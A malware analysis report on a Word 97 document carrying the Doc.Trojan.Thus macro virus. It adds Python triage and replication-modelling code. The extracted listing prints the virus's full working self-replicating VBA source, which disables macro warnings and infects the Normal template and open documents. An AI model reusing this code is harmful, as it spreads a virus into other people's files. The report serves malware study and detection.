Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 810800ab318fa50e…

MALICIOUS

Office (OLE)

Size: 47.5 KB
Created: 2001-11-12 16:27:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 35df0967465e89fe9972a4bb21b79fb2
SHA-1: ee79f531b50333df249d374079d72fb01e17f671
SHA-256: 810800ab318fa50e511fd1120a1bc23c49373c748d03ada6ff847f02da65b65b
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a Word 97-era document carrying a VBA macro project, indicated by multiple OLE_VBA_* heuristic firings and the ClamAV detection Doc.Trojan.Thus-16. The recovered module is a classic self-replicating macro virus, not a downloader. Its document_OPEN handler (also invoked from document_close and document_new, so the code runs on open, close and new-document events) first clears Application.Options.VirusProtection, the Word 97 macro-warning setting, under On Error Resume Next. It then reads line 1 of the first code module in the Normal template and compares it with the marker comment 'delta'. If the marker is absent, Normal is not yet infected: the macro deletes Normal's module, copies its own module in, and rewrites lines 44-47 and 14-17 so the Normal-resident copy propagates from Normal into documents rather than from a document into Normal. If the marker is present, it walks Application.Documents and copies Normal's module into every open document whose line 1 is not 'delta', rewriting the same two four-line slots back into the document form. It saves Normal when it has changed. The only other payload is a date trigger: on 28 December it quits Word with SaveChanges:=wdSaveChanges. Nothing in the extracted source opens a network connection, writes files outside the VBA project or starts another process, so no second-stage download is evidenced by this artifact. On Word 2002 and later, programmatic access to the VBProject object model is refused unless "Trust access to the VBA project object model" is enabled, and On Error Resume Next silently swallows that failure, so the replication step fails on a default modern install; the sample is still malicious and the document body, a seemingly official Ukrainian tax administration letter, is the lure meant to get the user to enable macros.

Heuristics 6

  • ClamAV: Doc.Trojan.Thus-16 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-16
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the "no modern VBA project was recovered" clause of the generic description does not hold: olevba did recover a VBA project (macros.bas under Extracted artifacts), so the WordBasic marker is corroborating evidence rather than the only one.
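The heuristics above establish that a VBA project with auto-exec handlers exists; they do not say what the macro does, which is what separates a self-replicating macro virus from a downloader. The following triage scorer is an added example, not part of the report's pipeline or of oletools: it runs regexes over olevba-style extracted source and labels the behaviour. Both inputs are constructed: SAMPLE_VBA is trimmed from the listing in this report with line continuations joined, DOWNLOADER_VBA is a made-up stub included only for contrast.

```python
"""Triage scorer for olevba-style extracted VBA source (added example).

It classifies what a macro does, so that a self-replicating macro virus
is not reported as a downloader merely because it has an auto-exec handler.
Both inputs below are constructed: SAMPLE_VBA is trimmed from the listing in
this report, DOWNLOADER_VBA is a made-up stub for contrast."""
import re

# Word/Excel auto-execution entry points (VBA names are case-insensitive).
AUTO_EXEC = re.compile(
    r"\bSub\s+(AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|Document_Open|"
    r"Document_Close|Document_New|Workbook_Open|Workbook_Close)\b", re.I)

# Behavioural indicators, each a regex applied to the whole source text.
INDICATORS = {
    "disables_macro_warning": re.compile(r"Options\.VirusProtection", re.I),
    "touches_vba_project": re.compile(r"\.VBProject\.VBComponents", re.I),
    "rewrites_code_module": re.compile(
        r"\.CodeModule\.(InsertLines|DeleteLines|AddFromString)", re.I),
    "infects_normal_template": re.compile(r"\bNormalTemplate\.VBProject", re.I),
    "iterates_open_documents": re.compile(r"Application\.Documents\.Item\(", re.I),
    "date_trigger": re.compile(r"\b(Month|Day)\(Date\)", re.I),
    # What a downloader or dropper would show and this sample does not.
    "downloader_or_shell": re.compile(
        r"URLDownloadToFile|XMLHTTP|WinHttp|InternetOpen|WScript\.Shell|"
        r"\bShell\b|CreateObject|powershell|Environ\(", re.I),
}


def infection_marker(source):
    """Return the comment literal used as the 'already infected' marker: a
    string of the form "'text'" that the macro compares with Lines(1, 1)."""
    m = re.search(r'=\s*"(\'[^"]*\')"', source)
    if m and re.search(r"CodeModule\.Lines\(1,\s*1\)", source, re.I):
        return m.group(1)
    return None


def triage_vba(source):
    """Score one extracted module and return indicators plus a verdict."""
    found = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    handlers = sorted({m.group(1).lower() for m in AUTO_EXEC.finditer(source)})
    replicates = (found["touches_vba_project"] and found["rewrites_code_module"]
                  and found["infects_normal_template"])
    if found["downloader_or_shell"]:
        verdict = "downloader-or-dropper"
    elif replicates:
        verdict = "macro-virus"
    elif handlers:
        verdict = "auto-exec-macro"
    else:
        verdict = "no-auto-exec"
    return {"verdict": verdict, "auto_exec_handlers": handlers,
            "infection_marker": infection_marker(source), **found}


# Constructed excerpt of the report's listing (line continuations joined).
SAMPLE_VBA = """'delta'
Private Sub document_OPEN()
    On Error Resume Next
    If Application.Options.VirusProtection Then Application.Options.VirusProtection = Not Application.Options.VirusProtection
    healthsearch = "'delta'"
    healthstr = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
    If healthstr <> healthsearch Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1
    End If
    For K = 1 To Application.Documents.Count
        Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4
    Next K
    If (Month(Date) = 12) And (Day(Date) = 28) Then Application.Quit SaveChanges:=wdSaveChanges
End Sub
Private Sub document_close()
    document_OPEN
End Sub
"""

# Made-up downloader stub, only to show the contrasting verdict.
DOWNLOADER_VBA = """Sub AutoOpen()
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell"
End Sub
"""

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("stub", DOWNLOADER_VBA)):
        print(name, triage_vba(src))
```

The downloader check is evaluated first on purpose: a macro that both replicates and launches a process is the more dangerous case and should be labelled as such. The indicator list is a starting point, not a complete catalogue; extend it with the API names your own samples use.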

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5725 bytes
SHA-256: d5b87c56e80320218ae3c27e2cf7bded52fb18c50bc69cb60d8659029cd3b674
Preview of the extracted script (first 1,000 lines; this module is shorter than that)
The listing is reproduced exactly as extracted, including its uneven indentation and blank lines, because the macro addresses its own code module by line number. Line 1 of the module is the 'delta' marker comment (the Attribute header lines are not part of the module's line count, which is why the macro compares Lines(1, 1) with "'delta'"); lines 14-17 and 44-47 are the two four-line slots it rewrites when copying itself between the Normal template and open documents.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'delta'
Private Sub document_OPEN()
    On Error Resume Next
    If Application.Options.VirusProtection Then Application.Options.VirusProtection = Not Application.Options.VirusProtection
    healthsearch = "'delta'"
    First = False
    healthstr = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
    If healthstr <> healthsearch Then
     First = True
     NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .deleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
  
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 44, 4
a1 = "Application.Documents.Item(K).VBProject.VBComponents.Item(1) _"
b1 = ".CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _"
c1 = ".Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _"
d1 = ".VBComponents.Item(1).CodeModule.CountOfLines)"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 45, b1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 46, c1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 47, d1
a1 = " ' '"
b1 = " ' '"
c1 = " ' '"
d1 = " ' '"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 14, a1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 15, b1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 16, c1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 17, d1
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    If Not First Then
    For K = 1 To Application.Documents.Count
    If Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> healthsearch Then
    Application.Documents.Item(K).VBProject.VBComponents.Item(1) _
    .CodeModule.deleteLines 1, Application.Documents.Item(K) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
 ' '
 ' '
 ' '
 ' '

Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4
a1 = "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _"
b1 = ".InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _"
c1 = ".CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _"
d1 = ".Item(1).CodeModule.CountOfLines)"
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 14, a1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 15, b1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 16, c1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 17, d1
a1 = " ' '"
b1 = " ' '"
c1 = " ' '"
d1 = " ' '"
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 44, 4
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 45, b1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 46, c1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 47, d1
    End If
     Next K
    End If
    If (Month(Date) = 12) And (Day(Date) = 28) Then Application.Quit SaveChanges:=wdSaveChanges
   End Sub
Private Sub document_close()
document_OPEN
End Sub
Private Sub document_new()
document_OPEN
End Sub
... (truncated)
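To check the claim that the macro keeps two forms of itself differing only in module lines 14-17 and 44-47, here is an added Python model of the listing's line arithmetic (written for this page; it is not code from the sample or from any analysis tool). It models VBIDE.CodeModule as a 1-based list of lines with the InsertLines/DeleteLines semantics the macro relies on; positions other than the eight rewritten lines are placeholders standing in for the 77-line module, and the names CodeModule, infect_normal, infect_document and patch_slot are this example's own.

```python
"""Model of the macro's two-form self-replication (added example; a Python
re-implementation of the listing's line arithmetic, not code from the sample
or from any analysis tool).

VBIDE.CodeModule is modelled as a 1-based list of lines with the
InsertLines/DeleteLines semantics the macro relies on.  Only the eight lines
the macro rewrites carry real text; every other position is a placeholder for
the 77-line module, so that lines 14-17 and 44-47 sit where they do in the
extracted source ('delta' is line 1; the Attribute header is not counted)."""

MODULE_LEN = 77

# Lines 14-17 of a document-resident copy: push this document's module into Normal.
DOC_TO_NORMAL = [
    "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _",
    ".InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _",
    ".CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _",
    ".Item(1).CodeModule.CountOfLines)",
]
# Lines 44-47 of a Normal-resident copy: push Normal's module into open document K.
NORMAL_TO_DOC = [
    "Application.Documents.Item(K).VBProject.VBComponents.Item(1) _",
    ".CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _",
    ".Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _",
    ".VBComponents.Item(1).CodeModule.CountOfLines)",
]
BLANKED = [" ' '"] * 4  # the four comment lines that fill whichever slot is inactive


class CodeModule:
    """Minimal stand-in for VBIDE.CodeModule: 1-based line addressing."""

    def __init__(self, lines):
        self.lines = list(lines)

    def count_of_lines(self):
        return len(self.lines)

    def lines_range(self, start, count):    # CodeModule.Lines(start, count)
        return self.lines[start - 1:start - 1 + count]

    def delete_lines(self, start, count):   # CodeModule.DeleteLines start, count
        del self.lines[start - 1:start - 1 + count]

    def insert_lines(self, line, text):     # CodeModule.InsertLines line, text
        self.lines.insert(line - 1, text)


def document_form():
    """The module as it sits in the infected document (the extracted listing)."""
    lines = [f"<line {n}>" for n in range(1, MODULE_LEN + 1)]
    lines[0] = "'delta'"
    lines[13:17] = DOC_TO_NORMAL   # lines 14-17 active
    lines[43:47] = BLANKED         # lines 44-47 blanked
    return CodeModule(lines)


def patch_slot(mod, start, new_lines):
    """The macro's idiom: deleteLines start, 4 then InsertLines start..start+3."""
    mod.delete_lines(start, 4)
    for i, text in enumerate(new_lines):
        mod.insert_lines(start + i, text)


def infect_normal(doc):
    """First-run branch (Normal's line 1 is not 'delta'): replace Normal's
    module with the document's, then activate 44-47 and blank 14-17."""
    normal = CodeModule(doc.lines_range(1, doc.count_of_lines()))
    patch_slot(normal, 44, NORMAL_TO_DOC)
    patch_slot(normal, 14, BLANKED)
    return normal


def infect_document(normal):
    """Later-run branch (Normal already infected): copy Normal's module into an
    open document, then activate 14-17 and blank 44-47."""
    doc = CodeModule(normal.lines_range(1, normal.count_of_lines()))
    patch_slot(doc, 14, DOC_TO_NORMAL)
    patch_slot(doc, 44, BLANKED)
    return doc


def is_infected(mod, marker="'delta'"):
    """The macro's own infection test: module line 1 equals the marker comment."""
    return mod.lines_range(1, 1) == [marker]


if __name__ == "__main__":
    normal = infect_normal(document_form())
    print("Normal form, lines 44-47:", normal.lines_range(44, 4))
    print("round trip identical:", infect_document(normal).lines == document_form().lines)
```

Because each rewrite deletes four lines and inserts four, the module length never changes and the slot positions stay valid across generations; that is why the original can hard-code 14 and 44. It also means the same line-1 marker check the macro uses is a cheap host-side indicator: a Normal template whose first module starts with the 'delta' comment has been infected by this family.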